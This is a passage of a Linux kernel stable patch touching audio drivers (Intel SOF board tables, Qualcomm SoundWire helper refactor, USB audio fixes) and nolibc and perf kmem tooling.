+ 					SOF_MAX98373_SPEAKER_AMP_PRESENT |
+@@ -632,7 +637,7 @@ static const struct platform_device_id board_ids[] = {
+ 	},
+ 	{
+ 		/* The limitation of length of char array, shorten the name */
+-		.name = "adl_mx98360a_nau8825",
++		.name = "adl_mx98360a_8825",
+ 		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
+ 					SOF_SPEAKER_AMP_PRESENT |
+ 					SOF_MAX98360A_SPEAKER_AMP_PRESENT |
+@@ -642,6 +647,16 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_SSP_BT_OFFLOAD_PRESENT),
+ 
+ 	},
++	{
++		.name = "adl_rt1015p_8825",
++		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
++					SOF_SPEAKER_AMP_PRESENT |
++					SOF_RT1015P_SPEAKER_AMP_PRESENT |
++					SOF_NAU8825_SSP_AMP(1) |
++					SOF_NAU8825_NUM_HDMIDEV(4) |
++					SOF_BT_OFFLOAD_SSP(2) |
++					SOF_SSP_BT_OFFLOAD_PRESENT),
++	},
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(platform, board_ids);
+@@ -663,3 +678,4 @@ MODULE_AUTHOR("Mac Chiang <mac.chiang@intel.com>");
+ MODULE_LICENSE("GPL");
+ MODULE_IMPORT_NS(SND_SOC_INTEL_HDA_DSP_COMMON);
+ MODULE_IMPORT_NS(SND_SOC_INTEL_SOF_MAXIM_COMMON);
++MODULE_IMPORT_NS(SND_SOC_INTEL_SOF_REALTEK_COMMON);
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 9990d5502d264..68b4fa352354d 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -430,6 +430,11 @@ static const struct snd_soc_acpi_codecs adl_rt5682_rt5682s_hp = {
+ 	.codecs = {"10EC5682", "RTL5682"},
+ };
+ 
++static const struct snd_soc_acpi_codecs adl_rt1015p_amp = {
++	.num_codecs = 1,
++	.codecs = {"RTL1015"}
++};
++
+ static const struct snd_soc_acpi_codecs adl_rt1019p_amp = {
+ 	.num_codecs = 1,
+ 	.codecs = {"RTL1019"}
+@@ -469,21 +474,21 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 	},
+ 	{
+ 		.id = "10508825",
+-		.drv_name = "adl_rt1019p_nau8825",
++		.drv_name = "adl_rt1019p_8825",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &adl_rt1019p_amp,
+ 		.sof_tplg_filename = "sof-adl-rt1019-nau8825.tplg",
+ 	},
+ 	{
+ 		.id = "10508825",
+-		.drv_name = "adl_max98373_nau8825",
++		.drv_name = "adl_max98373_8825",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &adl_max98373_amp,
+ 		.sof_tplg_filename = "sof-adl-max98373-nau8825.tplg",
+ 	},
+ 	{
+ 		.id = "10508825",
+-		.drv_name = "adl_mx98360a_nau8825",
++		.drv_name = "adl_mx98360a_8825",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &adl_max98360a_amp,
+ 		.sof_tplg_filename = "sof-adl-max98360a-nau8825.tplg",
+@@ -495,6 +500,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 		.quirk_data = &adl_rt1019p_amp,
+ 		.sof_tplg_filename = "sof-adl-rt1019-rt5682.tplg",
+ 	},
++	{
++		.id = "10508825",
++		.drv_name = "adl_rt1015p_8825",
++		.machine_quirk = snd_soc_acpi_codec_list,
++		.quirk_data = &adl_rt1015p_amp,
++		.sof_tplg_filename = "sof-adl-rt1015-nau8825.tplg",
++	},
+ 	{
+ 		.id = "10508825",
+ 		.drv_name = "sof_nau8825",
+diff --git a/sound/soc/qcom/Kconfig b/sound/soc/qcom/Kconfig
+index 96a6d4731e6fd..e7b00d1d9e99f 100644
+--- a/sound/soc/qcom/Kconfig
++++ b/sound/soc/qcom/Kconfig
+@@ -2,7 +2,6 @@
+ menuconfig SND_SOC_QCOM
+ 	tristate "ASoC support for QCOM platforms"
+ 	depends on ARCH_QCOM || COMPILE_TEST
+-	imply SND_SOC_QCOM_COMMON
+ 	help
+ 	  Say Y or M if you want to add support to use audio devices
+ 	  in Qualcomm Technologies SOC-based platforms.
+@@ -60,14 +59,16 @@ config SND_SOC_STORM
+ config SND_SOC_APQ8016_SBC
+ 	tristate "SoC Audio support for APQ8016 SBC platforms"
+ 	select SND_SOC_LPASS_APQ8016
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8016 SOC-based systems.
+ 	  Say Y if you want to use audio devices on MI2S.
+ 
+ config SND_SOC_QCOM_COMMON
+-	depends on SOUNDWIRE
++	tristate
++
++config SND_SOC_QCOM_SDW
+ 	tristate
+ 
+ config SND_SOC_QDSP6_COMMON
+@@ -144,7 +145,7 @@ config SND_SOC_MSM8996
+ 	depends on QCOM_APR
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8096 SoC-based systems.
+@@ -155,7 +156,7 @@ config SND_SOC_SDM845
+ 	depends on QCOM_APR && I2C && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	select SND_SOC_RT5663
+ 	select SND_SOC_MAX98927
+ 	imply SND_SOC_CROS_EC_CODEC
+@@ -169,7 +170,8 @@ config SND_SOC_SM8250
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_SDW
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SM8250 SoC-based systems.
+@@ -180,7 +182,8 @@ config SND_SOC_SC8280XP
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_SDW
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SC8280XP SoC-based systems.
+@@ -190,7 +193,7 @@ config SND_SOC_SC7180
+ 	tristate "SoC Machine driver for SC7180 boards"
+ 	depends on I2C && GPIOLIB
+ 	depends on SOUNDWIRE || SOUNDWIRE=n
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7180
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_RT5682_I2C
+@@ -204,7 +207,7 @@ config SND_SOC_SC7180
+ config SND_SOC_SC7280
+ 	tristate "SoC Machine driver for SC7280 boards"
+ 	depends on I2C && SOUNDWIRE
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7280
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_WCD938X_SDW
+diff --git a/sound/soc/qcom/Makefile b/sound/soc/qcom/Makefile
+index 8b97172cf990f..254350d9dc069 100644
+--- a/sound/soc/qcom/Makefile
++++ b/sound/soc/qcom/Makefile
+@@ -28,6 +28,7 @@ snd-soc-sdm845-objs := sdm845.o
+ snd-soc-sm8250-objs := sm8250.o
+ snd-soc-sc8280xp-objs := sc8280xp.o
+ snd-soc-qcom-common-objs := common.o
++snd-soc-qcom-sdw-objs := sdw.o
+ 
+ obj-$(CONFIG_SND_SOC_STORM) += snd-soc-storm.o
+ obj-$(CONFIG_SND_SOC_APQ8016_SBC) += snd-soc-apq8016-sbc.o
+@@ -38,6 +39,7 @@ obj-$(CONFIG_SND_SOC_SC8280XP) += snd-soc-sc8280xp.o
+ obj-$(CONFIG_SND_SOC_SDM845) += snd-soc-sdm845.o
+ obj-$(CONFIG_SND_SOC_SM8250) += snd-soc-sm8250.o
+ obj-$(CONFIG_SND_SOC_QCOM_COMMON) += snd-soc-qcom-common.o
++obj-$(CONFIG_SND_SOC_QCOM_SDW) += snd-soc-qcom-sdw.o
+ 
+ #DSP lib
+ obj-$(CONFIG_SND_SOC_QDSP6) += qdsp6/
+diff --git a/sound/soc/qcom/common.c b/sound/soc/qcom/common.c
+index 49c74c1662a3f..96fe80241fb41 100644
+--- a/sound/soc/qcom/common.c
++++ b/sound/soc/qcom/common.c
+@@ -180,120 +180,6 @@ err_put_np:
+ }
+ EXPORT_SYMBOL_GPL(qcom_snd_parse_of);
+ 
+-int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *sruntime,
+-			 bool *stream_prepared)
+-{
+-	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+-	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+-	int ret;
+-
+-	if (!sruntime)
+-		return 0;
+-
+-	switch (cpu_dai->id) {
+-	case WSA_CODEC_DMA_RX_0:
+-	case WSA_CODEC_DMA_RX_1:
+-	case RX_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_1:
+-	case TX_CODEC_DMA_TX_0:
+-	case TX_CODEC_DMA_TX_1:
+-	case TX_CODEC_DMA_TX_2:
+-	case TX_CODEC_DMA_TX_3:
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	if (*stream_prepared) {
+-		sdw_disable_stream(sruntime);
+-		sdw_deprepare_stream(sruntime);
+-		*stream_prepared = false;
+-	}
+-
+-	ret = sdw_prepare_stream(sruntime);
+-	if (ret)
+-		return ret;
+-
+-	/**
+-	 * NOTE: there is a strict hw requirement about the ordering of port
+-	 * enables and actual WSA881x PA enable. PA enable should only happen
+-	 * after soundwire ports are enabled if not DC on the line is
+-	 * accumulated resulting in Click/Pop Noise
+-	 * PA enable/mute are handled as part of codec DAPM and digital mute.
+-	 */
+-
+-	ret = sdw_enable_stream(sruntime);
+-	if (ret) {
+-		sdw_deprepare_stream(sruntime);
+-		return ret;
+-	}
+-	*stream_prepared  = true;
+-
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(qcom_snd_sdw_prepare);
+-
+-int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+-			   struct snd_pcm_hw_params *params,
+-			   struct sdw_stream_runtime **psruntime)
+-{
+-	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+-	struct snd_soc_dai *codec_dai;
+-	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+-	struct sdw_stream_runtime *sruntime;
+-	int i;
+-
+-	switch (cpu_dai->id) {
+-	case WSA_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_1:
+-	case TX_CODEC_DMA_TX_0:
+-	case TX_CODEC_DMA_TX_1:
+-	case TX_CODEC_DMA_TX_2:
+-	case TX_CODEC_DMA_TX_3:
+-		for_each_rtd_codec_dais(rtd, i, codec_dai) {
+-			sruntime = snd_soc_dai_get_stream(codec_dai, substream->stream);
+-			if (sruntime != ERR_PTR(-ENOTSUPP))
+-				*psruntime = sruntime;
+-		}
+-		break;
+-	}
+-
+-	return 0;
+-
+-}
+-EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_params);
+-
+-int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *sruntime, bool *stream_prepared)
+-{
+-	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+-	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+-
+-	switch (cpu_dai->id) {
+-	case WSA_CODEC_DMA_RX_0:
+-	case WSA_CODEC_DMA_RX_1:
+-	case RX_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_1:
+-	case TX_CODEC_DMA_TX_0:
+-	case TX_CODEC_DMA_TX_1:
+-	case TX_CODEC_DMA_TX_2:
+-	case TX_CODEC_DMA_TX_3:
+-		if (sruntime && *stream_prepared) {
+-			sdw_disable_stream(sruntime);
+-			sdw_deprepare_stream(sruntime);
+-			*stream_prepared = false;
+-		}
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_free);
+-
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup)
+ {
+diff --git a/sound/soc/qcom/common.h b/sound/soc/qcom/common.h
+index 3ef5bb6d12df7..d7f80ee5ae26a 100644
+--- a/sound/soc/qcom/common.h
++++ b/sound/soc/qcom/common.h
+@@ -5,19 +5,9 @@
+ #define __QCOM_SND_COMMON_H__
+ 
+ #include <sound/soc.h>
+-#include <linux/soundwire/sdw.h>
+ 
+ int qcom_snd_parse_of(struct snd_soc_card *card);
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup);
+ 
+-int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *runtime,
+-			 bool *stream_prepared);
+-int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+-			   struct snd_pcm_hw_params *params,
+-			   struct sdw_stream_runtime **psruntime);
+-int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *sruntime,
+-			 bool *stream_prepared);
+ #endif
+diff --git a/sound/soc/qcom/lpass-cpu.c b/sound/soc/qcom/lpass-cpu.c
+index 54353842dc07f..dbdaaa85ce481 100644
+--- a/sound/soc/qcom/lpass-cpu.c
++++ b/sound/soc/qcom/lpass-cpu.c
+@@ -1037,10 +1037,11 @@ static void of_lpass_cpu_parse_dai_data(struct device *dev,
+ 					struct lpass_data *data)
+ {
+ 	struct device_node *node;
+-	int ret, id;
++	int ret, i, id;
+ 
+ 	/* Allow all channels by default for backwards compatibility */
+-	for (id = 0; id < data->variant->num_dai; id++) {
++	for (i = 0; i < data->variant->num_dai; i++) {
++		id = data->variant->dai_driver[i].id;
+ 		data->mi2s_playback_sd_mode[id] = LPAIF_I2SCTL_MODE_8CH;
+ 		data->mi2s_capture_sd_mode[id] = LPAIF_I2SCTL_MODE_8CH;
+ 	}
+diff --git a/sound/soc/qcom/sc8280xp.c b/sound/soc/qcom/sc8280xp.c
+index ade44ad7c585a..14d9fea33d16a 100644
+--- a/sound/soc/qcom/sc8280xp.c
++++ b/sound/soc/qcom/sc8280xp.c
+@@ -12,6 +12,7 @@
+ #include <linux/input-event-codes.h>
+ #include "qdsp6/q6afe.h"
+ #include "common.h"
++#include "sdw.h"
+ 
+ #define DRIVER_NAME		"sc8280xp"
+ 
+diff --git a/sound/soc/qcom/sdw.c b/sound/soc/qcom/sdw.c
+new file mode 100644
+index 0000000000000..10249519a39e5
+--- /dev/null
++++ b/sound/soc/qcom/sdw.c
+@@ -0,0 +1,123 @@
++// SPDX-License-Identifier: GPL-2.0
++// Copyright (c) 2018, Linaro Limited.
++// Copyright (c) 2018, The Linux Foundation. All rights reserved.
++
++#include <linux/module.h>
++#include <sound/soc.h>
++#include "qdsp6/q6afe.h"
++#include "sdw.h"
++
++int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *sruntime,
++			 bool *stream_prepared)
++{
++	struct snd_soc_pcm_runtime *rtd = substream->private_data;
++	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
++	int ret;
++
++	if (!sruntime)
++		return 0;
++
++	switch (cpu_dai->id) {
++	case WSA_CODEC_DMA_RX_0:
++	case WSA_CODEC_DMA_RX_1:
++	case RX_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_1:
++	case TX_CODEC_DMA_TX_0:
++	case TX_CODEC_DMA_TX_1:
++	case TX_CODEC_DMA_TX_2:
++	case TX_CODEC_DMA_TX_3:
++		break;
++	default:
++		return 0;
++	}
++
++	if (*stream_prepared) {
++		sdw_disable_stream(sruntime);
++		sdw_deprepare_stream(sruntime);
++		*stream_prepared = false;
++	}
++
++	ret = sdw_prepare_stream(sruntime);
++	if (ret)
++		return ret;
++
++	/**
++	 * NOTE: there is a strict hw requirement about the ordering of port
++	 * enables and actual WSA881x PA enable. PA enable should only happen
++	 * after soundwire ports are enabled if not DC on the line is
++	 * accumulated resulting in Click/Pop Noise
++	 * PA enable/mute are handled as part of codec DAPM and digital mute.
++	 */
++
++	ret = sdw_enable_stream(sruntime);
++	if (ret) {
++		sdw_deprepare_stream(sruntime);
++		return ret;
++	}
++	*stream_prepared  = true;
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(qcom_snd_sdw_prepare);
++
++int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
++			   struct snd_pcm_hw_params *params,
++			   struct sdw_stream_runtime **psruntime)
++{
++	struct snd_soc_pcm_runtime *rtd = substream->private_data;
++	struct snd_soc_dai *codec_dai;
++	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
++	struct sdw_stream_runtime *sruntime;
++	int i;
++
++	switch (cpu_dai->id) {
++	case WSA_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_1:
++	case TX_CODEC_DMA_TX_0:
++	case TX_CODEC_DMA_TX_1:
++	case TX_CODEC_DMA_TX_2:
++	case TX_CODEC_DMA_TX_3:
++		for_each_rtd_codec_dais(rtd, i, codec_dai) {
++			sruntime = snd_soc_dai_get_stream(codec_dai, substream->stream);
++			if (sruntime != ERR_PTR(-ENOTSUPP))
++				*psruntime = sruntime;
++		}
++		break;
++	}
++
++	return 0;
++
++}
++EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_params);
++
++int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *sruntime, bool *stream_prepared)
++{
++	struct snd_soc_pcm_runtime *rtd = substream->private_data;
++	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
++
++	switch (cpu_dai->id) {
++	case WSA_CODEC_DMA_RX_0:
++	case WSA_CODEC_DMA_RX_1:
++	case RX_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_1:
++	case TX_CODEC_DMA_TX_0:
++	case TX_CODEC_DMA_TX_1:
++	case TX_CODEC_DMA_TX_2:
++	case TX_CODEC_DMA_TX_3:
++		if (sruntime && *stream_prepared) {
++			sdw_disable_stream(sruntime);
++			sdw_deprepare_stream(sruntime);
++			*stream_prepared = false;
++		}
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_free);
++MODULE_LICENSE("GPL v2");
+diff --git a/sound/soc/qcom/sdw.h b/sound/soc/qcom/sdw.h
+new file mode 100644
+index 0000000000000..d74cbb84da138
+--- /dev/null
++++ b/sound/soc/qcom/sdw.h
+@@ -0,0 +1,18 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++// Copyright (c) 2018, The Linux Foundation. All rights reserved.
++
++#ifndef __QCOM_SND_SDW_H__
++#define __QCOM_SND_SDW_H__
++
++#include <linux/soundwire/sdw.h>
++
++int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *runtime,
++			 bool *stream_prepared);
++int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
++			   struct snd_pcm_hw_params *params,
++			   struct sdw_stream_runtime **psruntime);
++int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *sruntime,
++			 bool *stream_prepared);
++#endif
+diff --git a/sound/soc/qcom/sm8250.c b/sound/soc/qcom/sm8250.c
+index 8dbe9ef41b1c9..9626a9ef78c23 100644
+--- a/sound/soc/qcom/sm8250.c
++++ b/sound/soc/qcom/sm8250.c
+@@ -12,6 +12,7 @@
+ #include <linux/input-event-codes.h>
+ #include "qdsp6/q6afe.h"
+ #include "common.h"
++#include "sdw.h"
+ 
+ #define DRIVER_NAME		"sm8250"
+ #define MI2S_BCLK_RATE		1536000
+diff --git a/sound/usb/implicit.c b/sound/usb/implicit.c
+index 41ac7185b42b6..4727043fd7458 100644
+--- a/sound/usb/implicit.c
++++ b/sound/usb/implicit.c
+@@ -471,7 +471,7 @@ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 	subs = find_matching_substream(chip, stream, target->sync_ep,
+ 				       target->fmt_type);
+ 	if (!subs)
+-		return sync_fmt;
++		goto end;
+ 
+ 	high_score = 0;
+ 	list_for_each_entry(fp, &subs->fmt_list, list) {
+@@ -485,6 +485,7 @@ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 		}
+ 	}
+ 
++ end:
+ 	if (fixed_rate)
+ 		*fixed_rate = snd_usb_pcm_has_fixed_rate(subs);
+ 	return sync_fmt;
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 99a66d0ef5b26..2c5765cbed2d6 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -160,9 +160,12 @@ find_substream_format(struct snd_usb_substream *subs,
+ bool snd_usb_pcm_has_fixed_rate(struct snd_usb_substream *subs)
+ {
+ 	const struct audioformat *fp;
+-	struct snd_usb_audio *chip = subs->stream->chip;
++	struct snd_usb_audio *chip;
+ 	int rate = -1;
+ 
++	if (!subs)
++		return false;
++	chip = subs->stream->chip;
+ 	if (!(chip->quirk_flags & QUIRK_FLAG_FIXED_RATE))
+ 		return false;
+ 	list_for_each_entry(fp, &subs->fmt_list, list) {
+@@ -525,6 +528,8 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 		if (snd_usb_endpoint_compatible(chip, subs->data_endpoint,
+ 						fmt, hw_params))
+ 			goto unlock;
++		if (stop_endpoints(subs, false))
++			sync_pending_stops(subs);
+ 		close_endpoints(chip, subs);
+ 	}
+ 
+@@ -935,8 +940,13 @@ get_sync_ep_from_substream(struct snd_usb_substream *subs)
+ 			continue;
+ 		/* for the implicit fb, check the sync ep as well */
+ 		ep = snd_usb_get_endpoint(chip, fp->sync_ep);
+-		if (ep && ep->cur_audiofmt)
+-			return ep;
++		if (ep && ep->cur_audiofmt) {
++			/* ditto, if the sync (data) ep is used by others,
++			 * this stream is restricted by the sync ep
++			 */
++			if (ep != subs->sync_endpoint || ep->opened > 1)
++				return ep;
++		}
+ 	}
+ 	return NULL;
+ }
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index f75601ca2d525..f10f4e6d3fb85 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -1222,6 +1222,12 @@ static int __snd_usb_parse_audio_interface(struct snd_usb_audio *chip,
+ 			if (err < 0)
+ 				return err;
+ 		}
++
++		/* try to set the interface... */
++		usb_set_interface(chip->dev, iface_no, 0);
++		snd_usb_init_pitch(chip, fp);
++		snd_usb_init_sample_rate(chip, fp, fp->rate_max);
++		usb_set_interface(chip->dev, iface_no, altno);
+ 	}
+ 	return 0;
+ }
+diff --git a/tools/include/nolibc/arch-mips.h b/tools/include/nolibc/arch-mips.h
+index 5fc5b8029bff9..7380093ba9e7d 100644
+--- a/tools/include/nolibc/arch-mips.h
++++ b/tools/include/nolibc/arch-mips.h
+@@ -192,6 +192,7 @@ struct sys_stat_struct {
+ __asm__ (".section .text\n"
+     ".weak __start\n"
+     ".set nomips16\n"
++    ".set push\n"
+     ".set    noreorder\n"
+     ".option pic0\n"
+     ".ent __start\n"
+@@ -210,6 +211,7 @@ __asm__ (".section .text\n"
+     "li $v0, 4001\n"              // NR_exit == 4001
+     "syscall\n"
+     ".end __start\n"
++    ".set pop\n"
+     "");
+ 
+ #endif // _NOLIBC_ARCH_MIPS_H
+diff --git a/tools/include/nolibc/arch-riscv.h b/tools/include/nolibc/arch-riscv.h
+index ba04771cb3a34..a3bdd9803f8cb 100644
+--- a/tools/include/nolibc/arch-riscv.h
++++ b/tools/include/nolibc/arch-riscv.h
+@@ -11,13 +11,13 @@
+ #define O_RDONLY            0
+ #define O_WRONLY            1
+ #define O_RDWR              2
+-#define O_CREAT         0x100
+-#define O_EXCL          0x200
+-#define O_NOCTTY        0x400
+-#define O_TRUNC        0x1000
+-#define O_APPEND       0x2000
+-#define O_NONBLOCK     0x4000
+-#define O_DIRECTORY  0x200000
++#define O_CREAT          0x40
++#define O_EXCL           0x80
++#define O_NOCTTY        0x100
++#define O_TRUNC         0x200
++#define O_APPEND        0x400
++#define O_NONBLOCK      0x800
++#define O_DIRECTORY   0x10000
+ 
+ struct sys_stat_struct {
+ 	unsigned long	st_dev;		/* Device.  */
+diff --git a/tools/perf/builtin-kmem.c b/tools/perf/builtin-kmem.c
+index ebfab2ca17024..40dd52acc48ae 100644
+--- a/tools/perf/builtin-kmem.c
++++ b/tools/perf/builtin-kmem.c
+@@ -26,6 +26,7 @@
+ #include "util/string2.h"
+ 
+ #include <linux/kernel.h>
++#include <linux/numa.h>
+ #include <linux/rbtree.h>
+ #include <linux/string.h>
+ #include <linux/zalloc.h>
+@@ -184,22 +185,33 @@ static int evsel__process_alloc_event(struct evsel *evsel, struct perf_sample *s
+ 	total_allocated += bytes_alloc;
+ 
+ 	nr_allocs++;
+-	return 0;
+-}
+ 
+-static int evsel__process_alloc_node_event(struct evsel *evsel, struct perf_sample *sample)
+-{
+-	int ret = evsel__process_alloc_event(evsel, sample);
++	/*
++	 * Commit 11e9734bcb6a ("mm/slab_common: unify NUMA and UMA
++	 * version of tracepoints") adds the field "node" into the
++	 * tracepoints 'kmalloc' and 'kmem_cache_alloc'.
++	 *
++	 * The legacy tracepoints 'kmalloc_node' and 'kmem_cache_alloc_node'
++	 * also contain the field "node".
++	 *
++	 * If the tracepoint contains the field "node" the tool stats the
++	 * cross allocation.
++	 */
++	if (evsel__field(evsel, "node")) {
++		int node1, node2;
+ 
+-	if (!ret) {
+-		int node1 = cpu__get_node((struct perf_cpu){.cpu = sample->cpu}),
+-		    node2 = evsel__intval(evsel, sample, "node");
++		node1 = cpu__get_node((struct perf_cpu){.cpu = sample->cpu});
++		node2 = evsel__intval(evsel, sample, "node");
+ 
+-		if (node1 != node2)
++		/*
++		 * If the field "node" is NUMA_NO_NODE (-1), we don't take it
++		 * as a cross allocation.
++		 */
++		if ((node2 != NUMA_NO_NODE) && (node1 != node2))
+ 			nr_cross_allocs++;
+ 	}
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int ptr_cmp(void *, void *);
+@@ -1368,8 +1380,8 @@ static int __cmd_kmem(struct perf_session *session)
+ 		/* slab allocator */
+ 		{ "kmem:kmalloc",		evsel__process_alloc_event, },
+ 		{ "kmem:kmem_cache_alloc",	evsel__process_alloc_event, },
+-		{ "kmem:kmalloc_node",		evsel__process_alloc_node_event, },
+-		{ "kmem:kmem_cache_alloc_node", evsel__process_alloc_node_event, },
++		{ "kmem:kmalloc_node",		evsel__process_alloc_event, },
++		{ "kmem:kmem_cache_alloc_node", evsel__process_alloc_event, },
+ 		{ "kmem:kfree",			evsel__process_free_event, },
+ 		{ "kmem:kmem_cache_free",	evsel__process_free_event, },
+ 		/* page allocator */
+@@ -1823,6 +1835,19 @@ static int parse_line_opt(const struct option *opt __maybe_unused,
+ 	return 0;
+ }
+ 
++static bool slab_legacy_tp_is_exposed(void)
++{
++	/*
++	 * The tracepoints "kmem:kmalloc_node" and
++	 * "kmem:kmem_cache_alloc_node" have been removed on the latest
++	 * kernel, if the tracepoint "kmem:kmalloc_node" is existed it
++	 * means the tool is running on an old kernel, we need to
++	 * rollback to support these legacy tracepoints.
++	 */
++	return IS_ERR(trace_event__tp_format("kmem", "kmalloc_node")) ?
++		false : true;
++}
++
+ static int __cmd_record(int argc, const char **argv)
+ {
+ 	const char * const record_args[] = {
+@@ -1830,22 +1855,28 @@ static int __cmd_record(int argc, const char **argv)
+ 	};
+ 	const char * const slab_events[] = {
+ 	"-e", "kmem:kmalloc",
+-	"-e", "kmem:kmalloc_node",
+ 	"-e", "kmem:kfree",
+ 	"-e", "kmem:kmem_cache_alloc",
+-	"-e", "kmem:kmem_cache_alloc_node",
+ 	"-e", "kmem:kmem_cache_free",
+ 	};
++	const char * const slab_legacy_events[] = {
++	"-e", "kmem:kmalloc_node",
++	"-e", "kmem:kmem_cache_alloc_node",
++	};
+ 	const char * const page_events[] = {
+ 	"-e", "kmem:mm_page_alloc",
+ 	"-e", "kmem:mm_page_free",
+ 	};
+ 	unsigned int rec_argc, i, j;
+ 	const char **rec_argv;
++	unsigned int slab_legacy_tp_exposed = slab_legacy_tp_is_exposed();
+ 
+ 	rec_argc = ARRAY_SIZE(record_args) + argc - 1;
+-	if (kmem_slab)
++	if (kmem_slab) {
+ 		rec_argc += ARRAY_SIZE(slab_events);
++		if (slab_legacy_tp_exposed)
++			rec_argc += ARRAY_SIZE(slab_legacy_events);
++	}
+ 	if (kmem_page)
+ 		rec_argc += ARRAY_SIZE(page_events) + 1; /* for -g */
+ 
+@@ -1860,6 +1891,10 @@ static int __cmd_record(int argc, const char **argv)
+ 	if (kmem_slab) {
+ 		for (j = 0; j < ARRAY_SIZE(slab_events); j++, i++)
+ 			rec_argv[i] = strdup(slab_events[j]);
++		if (slab_legacy_tp_exposed) {
